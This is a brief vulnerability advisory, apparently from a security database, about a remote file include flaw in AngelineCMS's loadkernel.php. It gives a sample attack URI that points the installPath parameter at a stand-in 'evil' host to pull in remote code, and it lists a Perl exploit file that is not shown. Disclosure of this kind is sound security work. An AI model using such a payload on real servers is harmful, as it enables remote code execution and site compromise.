• info
• discussion
• exploit
• solution
• references

AngelineCMS Loadkernel.PHP Remote File Include Vulnerability


This issue can be exploited through a web client.

An example URI has been provided:

http://www.example.com/[angelinecms_path]/kernel/loadkernel.php?installPath=http://www.example.com/evil?

The following exploit is available:

• /data/vulnerabilities/exploits/angelineCMS.pl